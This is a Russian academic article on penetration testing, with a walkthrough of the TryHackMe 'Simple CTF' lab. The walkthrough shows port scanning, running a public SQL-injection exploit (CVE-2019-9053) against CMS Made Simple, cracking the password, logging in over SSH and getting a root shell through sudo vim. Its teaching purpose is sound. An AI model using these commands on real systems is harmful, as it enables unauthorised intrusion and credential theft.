Научная статья на тему 'Оценка безопасности информационных систем с помощью тестирования на проникновение'

Оценка безопасности информационных систем с помощью тестирования на проникновение Текст научной статьи по специальности «Компьютерные и информационные науки»

CC BY
487
67
i Надоели баннеры? Вы всегда можете отключить рекламу.
Ключевые слова
Информационная безопасность / компьютерные системы / тестирование на проникновение / CTF / Information security / computer systems / penetration testing / CTF.

Аннотация научной статьи по компьютерным и информационным наукам, автор научной работы — Шкрадюк А.Д.

Подход к защите конфиденциальной информации от внешних угроз требует современных методов, ведь злоумышленники не стоят на месте и идут в ногу с развитием информационных технологий, а некоторые даже на шаг впереди. В данной статье рассмотрен современный метод защиты компьютерной информации от угроз путём имитации атаки злоумышленника извне на компьютерную систему или сеть, называемый в простонародье «Пентест».

i Надоели баннеры? Вы всегда можете отключить рекламу.

Похожие темы научных работ по компьютерным и информационным наукам , автор научной работы — Шкрадюк А.Д.

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.
i Надоели баннеры? Вы всегда можете отключить рекламу.

Information systems security assessment using penetration testing

The approach to protecting confidential information from external threats requires modern methods, because attackers do not stand still and keep pace with the development of information technology, and some are even one step ahead. This article discusses a modern method of protecting computer information from threats by simulating an attacker's attack from outside on a computer system or network, called in the common people "Pentest".

Текст научной работы на тему «Оценка безопасности информационных систем с помощью тестирования на проникновение»

Научная статья Original article

Оценка безопасности информационных систем с помощью тестирования на проникновение

Шкрадюк А.Д.

Уральский государственный экономический университет, г. Екатеринбург, Россия Автор-корреспондент: aleksey.shkradyuk@mail.ru

Аннотация: Подход к защите конфиденциальной информации от внешних угроз требует современных

методов, ведь злоумышленники не стоят на месте и идут в ногу с развитием информационных технологий, а некоторые даже на шаг впереди. В данной статье рассмотрен современный метод защиты компьютерной информации от угроз путём имитации атаки злоумышленника извне на компьютерную систему или сеть, называемый в простонародье «Пентест».

Ключевые слова: Информационная безопасность, компьютерные системы, тестирование на проникновение, СТТ.

Для цитирования: Шкрадюк А.Д. Оценка безопасности информационных систем путем тестирования на проникновение. Умная цифровая экономика. 2022. Т.2, №4, с. 18-30

Information systems security assessment using penetration testing

Shkradyuk A.D.

Ural State University of Economics, Yekaterinburg, Russia Corresponding author: aleksey.shkradyuk@mail.ru

Abstract:

The approach to protecting confidential information from external threats requires modern methods, because attackers do not stand still and keep pace with the development of information technology, and some are even one step ahead. This article discusses a modern method of protecting computer information from threats by simulating an attacker's attack from outside on a computer system or network, called in the common people "Pentest".

Keywords: Information security, computer systems, penetration testing, CTF.

For citation: Shkradyuk A.D. Information systems security assessment by penetration testing. Smart digital

economy. 2022. T.2, №4, pp. 18-30

Введение

В современном мире изо дня в день организации теряют большое количество ресурсов по причине атак злоумышленников на их информационные системы. Из-за подобных атак, как минимум, может нарушиться работоспособность сервисов компании, могут быть украдены персональные данные с серверов и выложены в общий доступ. Не все компании сообщают о подобных инцидентах, так как не хотят портить свою репутацию, но тем не менее, любая организация, использующая, например, облачные сервисы для хранения своих данных или

УМНАЯ ЦИФРОВАЯ ЭКОНОМИКА SMART DIGITAL ECONOMY

научный электронный журнал

клиентских баз, может быть подвержена цифровой атаке. Именно поэтому все организации, которые могут себе позволить, привлекают сторонних специалистов для тестирования своих IT-инфраструктур, веб-приложений и продуктов перед их выпуском в дальнейший оборот.

Главная цель тестирования - выявить любые слабые места в системе или сети, которыми могут воспользоваться злоумышленники. В любом приложении или сети чаще всего есть недостатки, которые злоумышленник может использовать для нарушения конфиденциальности, целостности или доступности данных, а также для дальнейшего эксплуатирования системы.

Получить практический опыт в данной области можно благодаря CTF соревнованиям.

CTF (Capture The Flag) - командные соревнования по компьютерной безопасности, цель которых захватить «флаг» - набор символов или произвольная фраза. Существует два формата проведения соревнований:

- task-based (jeopardy) - игрокам предоставляется набор заданий, к которым требуется найти ответ и отправить его. Каждое задание оценивается различным количеством очков, в зависимости от сложности. Обычно выделяются следующие категории: admin - задачи на администрирование; joy - различные развлекательные задачи вроде коллективной фотографии или мини-игры; ctb - задачи на аудит удалённых машин (crack the box); reverse - исследование программ без исходного кода (реверс-инжиниринг); stegano - стеганография; ppc - задачи на программирование; crypto - криптография; web - задачи на веб-уязвимости (SQL Injection, XSS и др.).

- classic - в классической схеме каждая команда получает выделенный сервер или небольшую сеть для поддержания её функционирования и защиты. Во время игры команды получают очки за корректную работу сервисов своего сервере и за украденную информацию (флаги) с серверов противников [3].

Целью статьи является разработка методики поиска уязвимостей в веб-приложениях с использованием программного обеспечения GNU/Kali-Linux на примере типовой задачи категории ctb форма CTF соревнования.

Основные понятия тестирования на проникновения

Разберёмся, что из себя представляет тестирование на проникновение. Тестирование на проникновение (жарг. Пентест) - метод оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника [6, 7]. При тестировании на проникновение эксперты создают условия, при которых имитируется реальная атака на информационные системы компании. В общем, специалисты повторяют действия настоящих хакеров, но на легальной основе.

Специалисты по тестированию на проникновение должны уметь то же, что и хакеры, чтобы имитировать атаки на информационные системы. Они могут называть себя «белыми» хакерами, этичными хакерами или же белошляпниками (White hat hacker), действия которых не нарушают закон и даже идут на пользу. Также существуют черношляпники и серошляпники. Черношляпники - люди, действия которых нарушают закон и несут вредительный характер, а серошляпники - это люди, чья активность постоянно скачет на грани законности. Этичные хакеры отличаются от информационных вредителей тем, что не используют тестируемые системы для своих личных целей, а лишь проверяют, может ли она

быть успешно атакована, если да, то как, и что нужно исправить, чтобы этого избежать. После проверки специалистом системы на уязвимости, создаётся отчёт и отправляется заказчику для дальнейшего усиления слабых мест.

Тестирование на проникновение является разносторонним методом проверки защиты компьютерных систем. Всё зависит от заказчика: что ему нужно проверить в своей системе. Это может быть упор на сети, приложения и ПО, социальную инженерию, устройства, а также и на физические системы, или же на всё сразу. Тестируя сети, специалисты ищут слабые узлы, неправильно настроенные протоколы, используют открытые порты, которые, по-хорошему, не должны быть открытыми. В локальных или сетевых приложениях, а также на крупных сайтах, пентестеры подделывают запросы, пытаются получить доступ к базе данных, встраивают в код вредоносные скрипты и мешают работе сеансов, и это только часть возможных действий. В социальной инженерии важен человеческий фактор: могут ли сотрудники случайно или намеренно сломать систему, поддаться на провокации злоумышленников, например, посредством фишинга - самым известным способом атаки с привлечением сотрудников. Тестируя устройства, этичные хакеры находят программные и аппаратные уязвимости, слабые места сети, к которой подключено устройство, пытаются получить пароли с помощью брутфорса. Физическими системами может являться дата-центр или любое другое охраняемое помещение. Кроме ^-инфраструктуры тестируется возможность взломать физический замок, обойти или вывести из строя камеры видеонаблюдения и различные датчики.

Существуют различные методики тестирования:

1. Внешнее тестирование - проводится от лица, атакующего с внешней стороны. Человек, не относящийся к компании, определяет возможные пути получения доступа к системе дистанционно.

2. Внутреннее тестирование - тестирование от лица пользователя со стандартными правами сотрудника компании, во время которого отыскивается возможность навредить системе изнутри случайным или специальным образом.

3. Белый ящик - у пентестера имеются знания о системе.

4. Черный ящик (слепое тестирование) - тестировщик не имеет предварительной информации о системе и ведёт себя как настоящий злоумышленник. Может опираться лишь на данные, имеющиеся в открытом доступе.

5. Серый ящик - имеются частичные знания о системе.

6. Двойное слепое тестирование - тестирование, находящееся в секрете (в том числе и от службы безопасности), о котором знают буквально 1-2 человека в компании. Данный метод помогает выявить уязвимости, которые нельзя обнаружить с помощью предыдущих методов. В случае такого метода тестирования, необходимо иметь при себе документы, подтверждающие, что тестировщик работает легально. Иначе могут быть проблемы со службой безопасности и законом.

Методика тестирования уязвимостей с помощью инструментальных средств Kali-Linux

Самый сильный и наиболее популярный инструмент любого пентестера - это дистрибутив Kali-Linux, основанный на базе Debian. Он включает в себя набор программ для тестирования уязвимостей и угроз безопасности прямо «из коробки». Именно этот инструмент будет использоваться в практической части данной статьи.

Для примера возьмём одну из задач CTF формата task-based категории ctb. В этом нам поможет сайт «TryHackMe», на котором в бесплатном доступе предоставляется множество виртуальных машин различных уровней сложности, но также имеется и платная подписка, расширяющая возможности пользователя. Для начала регистрируемся на сайте и скачиваем конфигурационный openvpn-файл, чтобы подключиться к сети «TryHackMe» и иметь доступ к тестируемым машинам. Для этого переходим во вкладку «Access», нажав на аватар своего профиля, скачиваем конфигурационный openvpn-файл и запускаем его в GNU/Linux (рисунки 1-3).

Рисунок 1. Вкладка «Access»

Рисунок 2. Загрузка конфигурационного файла

—(nezlo8®Kali-Linux)-; - ;

-S sudo openvpn -/Downloads/aleksey.shkradyu.ovpn

Рисунок 3. Запуск конфигурационного файла

Теперь можем приступать к выбору виртуальной машины.

Поищем несложную машину для дальнейшей попытки её взлома. Для этого переходим во вкладку «Learn», находящейся в «шапке» сайта в левом верхнем углу и выбираем «Search» (рисунок 4).

^Наск □ CD 9

Search

Q. Search over 500 rooms

Search hundreds of walkthroughs and challenges by se category or diFFiculty

Practice Search

Рисунок 4. Поиск виртуальной машины

Выбираем виртуальную машину под названием «Simple CTF» (рисунок 5).

Рисунок 5. Выбор виртуальной машины

Перед нами раскрывается список вопросов, на которые в ходе выполнения задания нужно будет дать ответы (рисунок 6).

© 0J)

Рисунок 6. Список вопросов Приступим к разбору данного задания. Запускаем виртуальную машину и ждём появления информации о ней (рисунок 7).

Active Machine Information

•> Add 1 hour

Terminate

Рисунок 7 - Информация о запущенной виртуальной машине

Видим название машины, её ГР-адрес и срок действия, который можно продлевать, если времени осталось менее часа. Первым делом пингуем полученный ГР-адрес для проверки связи между нами и машиной (рисунок 8).

I—(nezlo8® Kali-Linux}-[~] S ping 10.10.8.71

PING 10. 10.8.71 (10 10.8 71) 56(84) 3ytes oi data.

64 bytes from 10 . 10 8.71 icmp_seq=l tti=63 time=89 3 ms

64 bytes from 10 . 10 8.71 icmp_seq=2 ttl=63 time=91 9 ms

64 bytes from 10 . 10 8.71 icmp_seq=3 ttl=63 time=90 0 ms

64 bytes from 10 . 10 8.71 icmp_seq=4 ttl=63 time=89 0 ms

64 bytes from 10 . 10 8.71 icmp_seq=5 ttl=63 time=88 9 ms

— 10.10.8.71 ping statistics —

5 packets transmitted, 5 received, 0% packet loss, time 4008ms rtt min/avg/max/mdev = 88.907/89.813/91.896/1.101 ms

Рисунок 8. Проверка связи с машиной

@0J)

Машина отвечает на наши запросы. Приступаем к ответам на вопросы. Вопрос 1: сколько сервисов запущено под портом 1000? Для ответа на данный вопрос воспользуемся утилитой nmap и просканируем порты.

[—(nezloB® Kali-Linux)-[-] LS nmap 10.10.8.71 -vv

Starting Nmap 7.93 ( https://nniap.org ) at 2822-11-21 11:37 EST Initiating Ping Scan at 11:37 Scanning 10.10.E.71 [2 ports]

Completed Ping Scan at 11:37, 0.09s elapsed (1 total hosts)

Initiating Parallel DNS resolution of 1 host, at 11:37

Completed Parallel DNS resolution of 1 host, at 11:37, 0.00s elapsed

Initiating Connect Scan at 11:37

Scanning 10.10.8.71 [1000 ports]

Discovered open port 21/tcp on 10.10.8,71

Discovered open port 80/tcp on 10.10.8.71

Discovered open port 2222/tcp or 10.10.8.71

Completed Connect Scan at 11:37, 7.19s elapsed (1000 total ports)

Nmap scan report for 10.10.8.71

Host is up, received syn-ack (0.087s latency).

Scanned at 2022-11-21 11:37:02 EST for 7s

Not shown: 997 filtered tcp ports (no-response)

PORT STATE SERVICE REASON

21/tcp open ftp syn-ack

80/tcp open http syn-ack

2222/tcp open EtherNetIP-1 syn-ack

Read data files from: /usr/bin/../share/nmap

Nmap done: 1 IP address (1 host up) scanned in 7.31 seconds

Рисунок 9. Список открытых портов сервера

Можем заметить, что у нас есть два подходящих активных порта (рисунок 9). Порт 2222 не учитывается, т.к. в вопросе спрашивается про порты ниже, чем 1000. Отправляем ответ на сайте.

How many services are running under port 1000?

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.

Correct Answer

Рисунок 10. Ответ на первый вопрос

Ответ верный (рисунок 10). Приступаем к следующему вопросу: что работает на верхнем порту? Наш верхний порт - это 2222, он отвечает за соединение по протоколу «^Ь>. Отправляем ответ и убеждаемся, что он тоже верный (рисунок 11).

What is running on the higher port?

ssh

Correct Answer

Рисунок 11. Ответ на второй вопрос

Далее нас спрашивают, какой СУЕ мы будем использовать для атаки на приложение. Здесь явный намёк на то, что мы должны использовать эксплойт. Эксплойт - компьютерная программа, фрагмент программного кода или последовательность команд, использующие уязвимости в программном обеспечении и применяемые для проведения атаки на вычислительную систему. У каждого эксплойта есть свой код СУЪ - что-то вроде идентификатора. Для поиска подходящего нам эксплойта нужно узнать название и версию

© 0J)

используемого веб-приложения. Чтобы получить эти данные, используем программу «dirsearch» для поиска скрытых директорий.

I—(nezloS® Kali-Linux)-[~] I—$ dirsearch -u 10.10.8.71

Extensions: php, aspx, jsp, html, js I HTTP method: GET Threads: 30 I Wordlist size: 10927 Output File: /home/nezlo8/.dirsearch/reports/10.10.8.71_22-11-21_11-27-30.txt Error Log: /home/nezlo8/.dirsearch/logs/errors-22-ll-21_ll-27-30.log Target: http://10.10.8.71/

[11:27 30] Starting:

[11 27 36] 403 - 296В - / ht_wsr.txt

[11 27 36] 403 - 299В htaccess.bakl

[11 27 36] 403 - 299В htaccess.orig

[11 27 36] 403 - 301В - / htaccess.sample

[11 27 зб; 403 - 299В - htaccess.save

С il 27 36] 403 - 300В - htaccess_extra

[11 27 36] 403 - 299В - / htaccess_orig

[11 27 36] 403 - 297В - / htaccess_sc

[11 27 36] 403 - 297В - / htaccessBAK

[11 27 36] 403 - 297В - / htaccessOLD

[11 27 зб: 403 - 298В - / htaccessOLD2

[11 27 зб; 403 - 289В - htm

[11 27 зб; 403 - 290В - / html

С il 27 зб; 403 - 299В - / htpasswd_test

[11 27 ¿6; 403 - 295В _ / htpasswds

[11 27 36" 403 - 296В - / httr-oauth

[11 27 37; 403 - 289В - php

[11 28 04] 200 - 11КВ - /index.html

[11 28 18] 200 - 929В - /robots.txt

[11 28 19; 403 - 298В - /server-status

[11 28 19; 403 - 299В - / erver-status/

[11 28 21] 301 - 309В - /simple -» http

Task Completed

.8.71/simple/

Рисунок 12. Список скрытых директорий Видим, что нашлась одна скрытая директория (рисунок 12). Переходим на http://10.10.8.71/simple/ и смотрим, что мы имеем.

Рисунок 13. CMS Made Simple

В результате у нас есть название CMS (система создания и управления сайтом) - «Made Simple» (рисунок 13). На этой же странице определяем версию CMS системы (рисунок 14).

о о © © © ©

© Copyright 2004 - 2022 - CMS Made Simple This site is powered by CMS Made Simple versi 2.2.8

HOW CMSMS WORKS

Templates and stylesheets

Pages and navigation

Content

Menu Manager

Extensions

Event Manager

Workflow

Where do i get help?

Рисунок 14. Версия CMS Made Simple

Выполняем поиск эксплойтов с имеющимися у нас данными в терминале Linux, но можно и воспользоваться сайтом «www.exploit-db.com», базы данных одни и те же. Здесь уже дело вкуса, кому как удобнее, но лучше привыкать работать в терминале.

Рисунок 15. Найденный эксплойт

Найден подходящий эксплойт (рисунок 15), в основе которого лежит SQL-инъекция -уязвимость, которая возникает, когда у злоумышленника появляется возможность модифицировать SQL-запрос в приложении. Чтобы ответить на вопрос, нам нужно узнать CVE данного эксплойта. Внутри эксплойта всегда находится его описание, в том числе и CVE. Выводим текст скрипта (рисунок 16).

[—(nezloS® Kali-Linux)-[**]

$ locate 46635.py /usr/share/exploitdb/exploits/php/webapps/46635.py

r—(nezlo8® Kali-Linux)-[~]

t—S cat /usr/share/exploitdb/exploits/php/webapps/46635.py

#.' /usr/bin/env python

# Exploit Title: Unauthenticated SQL Injection on CMS Made Simple ^ 2.2.9

# Date: 30-03-2019

# Exploit Author: Daniele Scanu a) Certimeter Group

# Vendor homepage: https://vmn.cmsmadesimple.org/

It Software Link: https://wAV .cmsmadesimple.org/downloads/cmsms/

# Version: ^ 2.2.9

# Tested on: Ubuntu 18.04 LTS

# CVE : CVE-2019-9053

Рисунок 16. СУЬ эксплойта Можем отправить ответ сразу на два вопроса (рисунок 17).

Correct Answer

What's the CVE you're using against the application?

CVE-2019-90S3 To what kind of иuLnerability is the application vulnerable? sqli

Рисунок 17. Ответы на третий и четвертый вопросы

26

Correct Answer

Дальше начинается самое интересное: нам предстоит добыть пароль и получить доступ к машине. Для этого применяем найденный эксплойт. Чтобы понять, как он работает, снова просматриваем скрипт, находим описание применения атрибутов «-т>, «-т> и «-о (рисунок 18).

parser = optparse.OptionParserC)

parser.add_option('-u', '—url", action="store", dest="url", help="Base target uri (ex. http://l0.10.10.100/cms)") parser.add_option('-w", '—wordlist", action="store", dest="wordlist", help="Wordlist for crack admin password") parser.add_option('-c', '—crack"F action="store_true", dest="cracking", help="Crack password with wordlist", defauQ

Рисунок 18. Описание применения атрибутов «-т>, «^>> и «-о Запускаем эксплойт с применением вышеприведенных атрибутов (рисунок 19).

—(nezlo8® Kali-Linux )-[*-]

-$ python2 /usr/share/exploitdb/exploits/php/webapps/46635.py -u http ://10.10.8.71/simple/ -c -w /usr/share/wordlis

ts/rockyou.txt

Рисунок 19. Запуск эксплойта

Спустя некоторое время получаем данные пользователя (рисунок 20).

[+] Salt for password found: Idac0d92e9fa6bb2

[+] Username found: mitch

[+] Email foundi adminaadmin.com

O] Password found: 0c0im68bd75d7a8<.c7eb738i.6e8d96

[+] Password cracked: secret

Рисунок 20. Полученные данные пользователя

Отправляем ответ на пятый вопрос (рисунок 21).

Рисунок 21. Ответ на пятый вопрос

Приступаем к следующему вопросу: где можно войти с полученными данными? Вспоминаем, что у нас имеется открытый порт 2222, который отвечает за ssh-соединение. Очевидно, что с полученными данными мы можем войти по протоколу «^Ь>. Отправляем ответ (рисунок 22).

Where can you login with the details obtained?

ssh

Correct Answer

Рисунок 22. Ответ на шестой вопрос

Подключаемся к серверу по протоколу и находим в каталоге пользователя файл

user.txt, выводим его содержимое в консоль (рисунок 23).

© 0J)

iНе можете найти то, что вам нужно? Попробуйте сервис подбора литературы.

F—(riezloS® Kali-Linux)-[«] L-S ssh -p 2222 mitchó)10.10.8.71

The authenticity of host '[10.10.8.71]:2222 ([10.10.8.71]:2222)1 can't be established. ED25519 key fingerprint is SHA256:iq4f0XcnA5nnPNAufEq0pvTb08d0JPcHGgmeABEdQ5g. This host key is known by the following other names/addresses:

-/.ssh/known_hosts:9: [hashed name] Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '[10.10.8.71]:2222' (ED25519) to the list of known hosts. mitch5)10.10.8.71's password:

Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-58-generic Í686)

* Documentation: https://help.ubuntu.com

* Management: https://landscape.canonical.com

* Support: https://ubuntu.com/advantage

0 packages can be updated. 0 updates are security updates.

Last login: Mon Aug 19 18:13:41 2019 from 192.168.0.190 $ pwd

/home/mitch $ Is -la total 36

drwxr-x— 3 mitch mitch 4096 aug 19 2019 . drwxr-xr-x 4 root root 4096 aug 17 2019 ..

-rw- 1 mitch mitch 178 aug 17 2019 .bash_history

-rw-r—r— 1 mitch mitch 220 sep 1 2015 .bash_logout -rw-r — r — 1 mitch mitch 3771 sep 1 2015 .bashrc

drwx- 2 mitch mitch 4096 aug 19 2019 .cache

-rw-r — r— 1 mitch mitch 655 mai 16 2017 .profile -rw-rw-r— 1 mitch mitch 19 aug 17 2019 user.txt

-rw- 1 mitch mitch 515 aug 17 2019 .viminfo

$ cat user.txt G00d j0b, keep up! î i

Рисунок 23. Флаг пользователя Отправляем найденный флаг на сайт (рисунок 24).

What's the user Flag? GOOd jOb, keep up!

Correct Answer

Рисунок 24. Ответ на седьмой вопрос

Мы получили доступ к серверу, используя удалённое подключение по протоколу «ssh». Следующее, что от нас требуется - найти имя ещё одного пользователя. Для этого смотрим содержимое директории /home и видим ещё одного пользователя под именем «sunbath» (рисунок 25). Это и есть наш ответ. Отправляем на сайт (рисунок 26).

mitchíüMachime : Is /home

milch sunbath mitchíüMachime : |

Рисунок 25. Второй пользователь

Is there any other user in the home directory? What's its name?

sunbath

Correct Answer

Рисунок 26. Ответ на восьмой вопрос

Далее нас спрашивают, что мы можем сделать для получения привилегированной оболочки. Посмотрим, какие команды можно выполнить с root-правами без ввода root-пароля, введя команду «sudo -l» (рисунок 27).

mitchaJHachine: sudo -I

User mitch may run the following commands on Machine:

(root) NOPASSWD: /usr/bin/vim mitchaJHachine:|

Рисунок 27. Команды, разрешенные на выполнение с root-правами без ввода root-пароля

Видим, что доступна команда «vim». Фиксируем данную информацию на сайте (рисунок 28).

What сап you leverage to spawn a privileged shell?

Correct Answer

Рисунок 28. Ответ на девятый вопрос

Мы стали ещё ближе к получению root-прав. Используем команду «vim» с root-правами для получения привилегированной оболочки и находим флаг root-пользователя (рисунок 29).

mitchfflMachine:sudo vim -с ':!/bin/bash'

rootcùMachine:~S pwd /home/mitch

rootcùMachine:-# cd /root rootcùMachine:/roots Is root.txt

rootSMachine :/roots cat root.txt W3U d0n3. Vol made it! rootSJMachire:/roots |

Рисунок 29. Получение root-прав и флага root-пользователя

Отправляем ответ и завершаем задание (рисунок 30).

What's the root Flag?

W3II d0n3. You made it!

Correct Answer

Рисунок 30. Ответ на десятый вопрос

Задание успешно выполнено. Мы получили root-права и ответили на все вопросы в задании.

Подводя итоги данного исследования, можно сделать вывод, что в современное время почти любая информационная система имеет те или иные уязвимости, и одним из лучших способов их пресечь является привлечение специалистов по тестированию на проникновение для обнаружения слабых мест и дальнейшего их усиления. В статье были рассмотрены современный метод оценки безопасности компьютерных систем или сетей средствами моделирования атаки злоумышленника и способ получения практических навыков в этой сфере. Также было приведено решение одного из типовых кейсов для демонстрации практической стороны данного метода.

Список литературы

1. Википедия. Испытание на проникновение. [Электронный ресурс]. URL: https://щ.wikipedia.org/wiki/Испытание на проникновение (дата обращения: 21.11.2022).

2. SkillFactory.Блог. Пентест. [Электронный ресурс]. URL: https://blog.skillfactory.ru/glossary/pentest/ (дата обращения: 20.11.2022).

3. Курс молодого бойца CTF. [Электронный ресурс]. URL: https://kmb.cybber.ru/ (дата обращения: 21.11.2022).

4. Kali Linux | Penetration Testing and Ethical Hacking Linux Distribution. [Электронный ресурс]. URL: https://www.kali.org/ (дата обращения: 21.11.2022).

5. TryHackMe. [Электронный ресурс]. URL: https://tryhackme.com/ (дата обращения: 21.11.2022).

6. Georgia Weidman. Penetration Testing. A Hands-On Introduction to Hacking. San Francisco, 2014. 495 с.

7. Kanimozhi V.R and Shanmugapriya N., 2019, Ethical Hacking: the Need for Cyber Security. Int J Recent Sci Res. 10(10), pp. 35339-35341.

© Шкрадюк А.Д., 2022. Умная цифровая экономика. 2022. Т.4, №2

i Надоели баннеры? Вы всегда можете отключить рекламу.